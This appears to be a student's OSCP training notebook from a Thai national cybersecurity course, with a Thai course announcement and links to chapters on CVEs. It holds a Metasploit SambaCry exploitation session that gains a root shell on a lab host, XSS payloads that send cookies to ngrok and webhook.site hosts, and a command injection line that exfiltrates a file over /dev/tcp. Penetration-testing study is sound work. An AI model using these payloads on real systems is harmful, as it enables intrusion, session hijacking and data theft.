# OSCP

## information

![📣](https://static.xx.fbcdn.net/images/emoji.php/v9/tba/1/16/1f4e3.png)

แจ้งกำหนดการอบรมรอบที่ 2 – Road to OSCP (MOOC)

เรียนผู้เข้าอบรมทุกท่าน

ท่านได้รับสิทธิ์เข้าร่วมอบรมในหลักสูตร Road to OSCP – Self Learning ทางทีมขอแจ้งรายละเอียดสำคัญ ดังนี้

![📅](https://static.xx.fbcdn.net/images/emoji.php/v9/t7e/1/16/1f4c5.png)

ระยะเวลาการอบรม
• เริ่มการอบรมในวันที่ 21 พ.ย. – 5 ธ.ค. 2568
• เรียนออนไลน์ผ่านระบบ NCSA MOOC
• เข้าเรียนเวลาใดก็ได้ ภายในช่วงที่กำหนด

![🧭](https://static.xx.fbcdn.net/images/emoji.php/v9/tb0/1/16/1f9ed.png)

วิธีเข้าเรียน
เข้าระบบ NCSA MOOC ด้วยอีเมลที่ลงทะเบียนตรวจสอบคอร์ส Road to OSCP – Self Learning
เรียนให้ครบ + ทำ
• Post-test
• แบบประเมินหลังเรียน

![📌](https://static.xx.fbcdn.net/images/emoji.php/v9/tac/1/16/1f4cc.png)

เกณฑ์ผ่านรอบที่ 2 (MOOC)

1) เกณฑ์หลัก (90 คะแนน) ดังนี้
• เรียนไม่น้อยกว่า 80% คิดเป็น 20 คะแนน
• Post-test ≥ 80% คิดเป็น 70 คะแนน
• เริ่มสอบได้: 1 – 5 ธ.ค. 2568 (วันที่ 5 ธ.ค ปิดระบบสอบ 16.00 น.)
• เวลาในการทำข้อสอบ: 5 ชม. (ทำเวลาไหนก็ได้)

2) เอกสารที่ต้องส่ง (10 คะแนน) 
ส่งผ่านแบบ google form ประกอบด้วย
• CV / Profile
• ประสบการณ์ Cybersecurity / Pentest
• Motivation / เหตุผลและความตั้งใจในการต่อยอดสายงานนี้
รวมมาเป็นไฟล์ PDF 1 ไฟล์
รูปแบบไฟล์ : PDF
ขนาดไฟล์ : ไม่เกิน 10 MB 
การตั้งชื่อไฟล์ : ชื่อ-นามสกุล

โดยส่งที่ช่องทาง

[**https://forms.gle/f9ua3iHAXtD7fhNW7**](https://forms.gle/f9ua3iHAXtD7fhNW7)

ภายในวันที่ 6 ธันวาคม 2568 ค่ะ

![👉](https://static.xx.fbcdn.net/images/emoji.php/v9/t51/1/16/1f449.png)

ผู้ที่มีคะแนนรวมสูงสุด 50 อันดับแรก จะได้เข้าสู่รอบ 3: Pre OSCP Bootcamp (2 วัน)

ผู้ที่ผ่านเกณฑ์จะได้รับ
• ประกาศนียบัตร Basic Penetration Testing (MOOC)
ออกโดย สำนักงานคณะกรรมการการรักษาความมั่นคงปลอดภัยไซเบอร์แห่งชาติ (สกมช.)

หากท่านได้ดำเนินการแล้ว ต้องขออภัยมา ณ ที่นี้ด้วย และขอขอบพระคุณเป็นอย่างสูง

![⚠️](https://static.xx.fbcdn.net/images/emoji.php/v9/tdc/1/16/26a0.png)

หมายเหตุ
ผลการพิจารณาของ สกมช. ถือเป็นที่สิ้นสุด

ทีม สกมช. ขอให้ทุกท่านเรียนอย่างราบรื่น และขอเป็นกำลังใจให้ประสบความสำเร็จในการอบรมครั้งนี้ค่ะ

![💙](https://static.xx.fbcdn.net/images/emoji.php/v9/t6c/1/16/1f499.png)

![✨](https://static.xx.fbcdn.net/images/emoji.php/v9/tf4/1/16/2728.png)

เนื่องจากวันนี้เป็นวันแรกของการอบรมรอบ2 อย่างเป็นทางหาร ทางสกมช. จะมีการส่งเมลการอบรมรอบ 2 ไปให้นะคะ ซึ่งจะป็นเนื้อหาเดียวกันนะคะ

## cant do

**Metasploit**

## metasploit

┌──(winniethesuii㉿winniethesuii)-[~/Desktop/OSCP_COURSE]
└─$ msfconsole
Metasploit tip: Network adapter names can be used for IP options set LHOST
eth0

```
  .:okOOOkdc'           'cdkOOOko:.
.xOOOOOOOOOOOOc       cOOOOOOOOOOOOx.

```

:OOOOOOOOOOOOOOOk,   ,kOOOOOOOOOOOOOOO:
'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'
oOOOOOOOO.MMMM.oOOOOoOOOOl.MMMM,OOOOOOOOo
dOOOOOOOO.MMMMMM.cOOOOOc.MMMMMM,OOOOOOOOx
lOOOOOOOO.MMMMMMMMM;d;MMMMMMMMM,OOOOOOOOl
.OOOOOOOO.MMM.;MMMMMMMMMMM;MMMM,OOOOOOOO.
cOOOOOOO.MMM.OOc.MMMMM'oOO.MMM,OOOOOOOc
oOOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOOo
lOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOl
;OOOO'MMM.OOOO.MMM:OOOO.MMM;OOOO;
.dOOo'[WM.OOOOocccxOOOO.MX](http://wm.ooooocccxoooo.mx/)'xOOd.
,kOl'M.OOOOOOOOOOOOO.M'dOk,
:kk;.OOOOOOOOOOOOO.;Ok:
;kOOOOOOOOOOOOOOOk:
,xOOOOOOOOOOOx,
.lOOOOOOOl.
,dOd,
.

```
   =[ metasploit v6.4.69-dev                          ]

```

- - --=[ 2529 exploits - 1302 auxiliary - 432 post ]
- - --=[ 1672 payloads - 49 encoders - 13 nops ]
- - --=[ 9 evasion ]

Metasploit Documentation: [https://docs.metasploit.com/](https://docs.metasploit.com/)

msf6 > use exploit/linux/samba/is_known_pipename
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(linux/samba/is_known_pipename) > set RHOSTS 34.87.111.36
RHOSTS => 34.87.111.36
msf6 exploit(linux/samba/is_known_pipename) > set RPORT 445
RPORT => 445
msf6 exploit(linux/samba/is_known_pipename) > set SMB::AlwaysEncrypt false
SMB::AlwaysEncrypt => false
msf6 exploit(linux/samba/is_known_pipename) > set SMB::ProtocolVersion 1
SMB::ProtocolVersion => 1
msf6 exploit(linux/samba/is_known_pipename) > check
/usr/share/metasploit-framework/vendor/bundle/ruby/3.3.0/gems/recog-3.1.17/lib/recog/fingerprint/regexp_factory.rb:34: warning: nested repeat operator '+' and '?' was replaced with '*' in regular expression
[+] 34.87.111.36:445 - Samba version 4.3.8 found with writeable share 'share'
[*] 34.87.111.36:445 - The target appears to be vulnerable.
msf6 exploit(linux/samba/is_known_pipename) > set PAYLOAD linux/x86/meterpreter/reverse_tcp
[-] The value specified for PAYLOAD is not valid.
msf6 exploit(linux/samba/is_known_pipename) > set TARGET 0
TARGET => 0
msf6 exploit(linux/samba/is_known_pipename) > set PAYLOAD cmd/unix/interact
PAYLOAD => cmd/unix/interact
msf6 exploit(linux/samba/is_known_pipe
msf6 exploit(linux/samba/is_known_pipename) > exploit
[*] 34.87.111.36:445 - Using location \\34.87.111.36\share\ for the path
[*] 34.87.111.36:445 - Retrieving the remote path of the share 'share'
[*] 34.87.111.36:445 - Share 'share' has server-side path '/tmp/
[*] 34.87.111.36:445 - Uploaded payload to \\34.87.111.36\share\[UrAiTfAZ.so](http://uraitfaz.so/)
[*] 34.87.111.36:445 - Loading the payload from server-side path /tmp/UrAiTfAZ.so using \\PIPE\/tmp/UrAiTfAZ.so...
[-] 34.87.111.36:445 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 34.87.111.36:445 - Loading the payload from server-side path /tmp/UrAiTfAZ.so using /tmp/UrAiTfAZ.so...
[+] 34.87.111.36:445 - Probe response indicates the interactive payload was loaded...
[*] Found shell.
[*] Command shell session 1 opened (172.20.10.2:43847 -> 34.87.111.36:445) at 2025-11-28 11:32:23 +0700

id
uid=0(root) gid=0(root) groups=0(root)
cat /root/flag*
cve{1TCccksGNc}
[*] 34.87.111.36 - Command shell session 1 closed.
msf6 exploit(linux/samba/is_known_pipename) >

**CVE-2017-7494 - SMB - RCE [Sambacry]**

<script>location.href='[https://biliously-unshrinkable-sharri.ngrok-free.dev/stealer.php?cookie='+document.cookie;</script](https://biliously-unshrinkable-sharri.ngrok-free.dev/stealer.php?cookie=%27+document.cookie;%3C/script)>

<script>new Image().src="[https://biliously-unshrinkable-sharri.ngrok-free.dev/log?c=](https://biliously-unshrinkable-sharri.ngrok-free.dev/log?c=)"+document.cookie;</script>

view-source:[http://34.126.166.201/support.php](http://34.126.166.201/support.php)

```
<https://webhook.site/1976c56b-fae1-4381-8399-068dedac70b4?c=PHPSESSID=7qg1526s9vk615hghc0gcl2qv3>

```

ขอบคุณครับ ผมยืนยันข้อมูลดังนี้ครับ:
IP ของโจทย์: 34.126.166.201
Email ที่ใช้สอบ: [wilwillearning@gmail.com](mailto:wilwillearning@gmail.com)

เหลือเวลาสอบประมาณ 1.5 ชั่วโมง รบกวนช่วย reset instance ให้ด้วยครับ

ขอบคุณครับ

## Chapter 4 - Netcat

[**Netcat without netcat**](OSCP/Netcat%20without%20netcat%202b731c4ba8c68042b390c2b1a7079007.md)

## **Chapter 5 - Network Security**

[**CVE-2017-17405**](OSCP/CVE-2017-17405%202b931c4ba8c6802cacdef9a7a122fa24.md)

[**โจมตี Redis ที่ Master-Slave mode**](OSCP/%E0%B9%82%E0%B8%88%E0%B8%A1%E0%B8%95%E0%B8%B5%20Redis%20%E0%B8%97%E0%B8%B5%E0%B9%88%20Master-Slave%20mode%202b931c4ba8c6803ebe1ae33fc12aaa06.md)

[**CVE-2019-10149 - Exim4 - RCE**](OSCP/CVE-2019-10149%20-%20Exim4%20-%20RCE%202b931c4ba8c680dd9254e44897aebf58.md)

[**CVE-2017-11610 - Supervisord - RCE**](OSCP/CVE-2017-11610%20-%20Supervisord%20-%20RCE%202b931c4ba8c680548053d2c4aac1f99c.md)

[**CVE-2016-10033 - Wordpress - Object Injection**](OSCP/CVE-2016-10033%20-%20Wordpress%20-%20Object%20Injection%202b831c4ba8c6800a880dc59955c964a1.md)

[**CVE-2016-10033 - PHPMailer - RCE**](OSCP/CVE-2016-10033%20-%20PHPMailer%20-%20RCE%202b831c4ba8c680328889cd3e8ee17b29.md)

[**CVE-2017-12615 - Tomcat - PUT Method**](OSCP/CVE-2017-12615%20-%20Tomcat%20-%20PUT%20Method%202b731c4ba8c68092924de443e3245573.md)

[**CVE-2019-5475 - Nexus Manager - RCE**](OSCP/CVE-2019-5475%20-%20Nexus%20Manager%20-%20RCE%202b731c4ba8c680b493c2c1580d326a96.md)

[crontab](OSCP/crontab%202b731c4ba8c68097ab78dfe8627c33c7.md)

[redis](OSCP/redis%202b731c4ba8c680c692e0ea70ca44c473.md)

[**CVE-2012-2122 - MySQL - Login Bypass**](OSCP/CVE-2012-2122%20-%20MySQL%20-%20Login%20Bypass%202b731c4ba8c680d7a252ddcd9584db5f.md)

[**DNS**](OSCP/DNS%202b231c4ba8c6803fa4e6e21df07d1c71.md)

## **Chapter 6 - Web Security**

[**Wordpress with well-known vulnerability**](OSCP/Wordpress%20with%20well-known%20vulnerability%202b731c4ba8c6802299c6faad438c2682.md)

[**SQL Injection ด้วย SQLMap สำหรับ POST Data**](OSCP/SQL%20Injection%20%E0%B8%94%E0%B9%89%E0%B8%A7%E0%B8%A2%20SQLMap%20%E0%B8%AA%E0%B8%B3%E0%B8%AB%E0%B8%A3%E0%B8%B1%E0%B8%9A%20POST%20Data%202b731c4ba8c680fda27dd190bafbd692.md)

## blind command injection

127.0.0.1;`bash -c "cat /var/www/html/secret_xxxx.txt > /dev/tcp/0.tcp.ap.ngrok.io/10648"`

[**Robots.txt คืออะไร**](OSCP/Robots%20txt%20%E0%B8%84%E0%B8%B7%E0%B8%AD%E0%B8%AD%E0%B8%B0%E0%B9%84%E0%B8%A3%202b231c4ba8c6800e909cecdbd510b7ec.md)

[**Directory Listing**](OSCP/Directory%20Listing%202b231c4ba8c680868387dae66e9bbf21.md)

[**วิธีการผ่านหน้า Javascript login**](OSCP/%E0%B8%A7%E0%B8%B4%E0%B8%98%E0%B8%B5%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%9C%E0%B9%88%E0%B8%B2%E0%B8%99%E0%B8%AB%E0%B8%99%E0%B9%89%E0%B8%B2%20Javascript%20login%202b231c4ba8c680f39742c1cf09afb30b.md)

[Autocomplete](OSCP/Autocomplete%202b231c4ba8c68045b381c5fab3f99f3e.md)

[**Backup Lab**](OSCP/Backup%20Lab%202b231c4ba8c680e6a4aff274a946501c.md)

[**Blind Command Injection**](OSCP/Blind%20Command%20Injection%202b231c4ba8c68073a35cee2843138318.md)

[Wordpress with well-known vulnerability](OSCP/Wordpress%20with%20well-known%20vulnerability%202b231c4ba8c680b58117fe0528ebedc3.md)

[**Command Injection with filter**](OSCP/Command%20Injection%20with%20filter%202b731c4ba8c68074ab88e6e79f012619.md)

[command injection with separate filter](OSCP/command%20injection%20with%20separate%20filter%202b731c4ba8c68059b70cd2b50e860cc1.md)

[**Union - SQL Injection**](OSCP/Union%20-%20SQL%20Injection%202b731c4ba8c68079941fea10ba406e6c.md)

## **Chapter 7 - Post Explotiation**

[**Race Condition#1**](OSCP/Race%20Condition#1%202b931c4ba8c6807d8535ec4f5c5aff1b.md)

[privesc](OSCP/privesc%202b731c4ba8c680aa823be1335073fa7d.md)

[**SetUID with passwd**](OSCP/SetUID%20with%20passwd%202b231c4ba8c6800587e3cd45249fbcf1.md)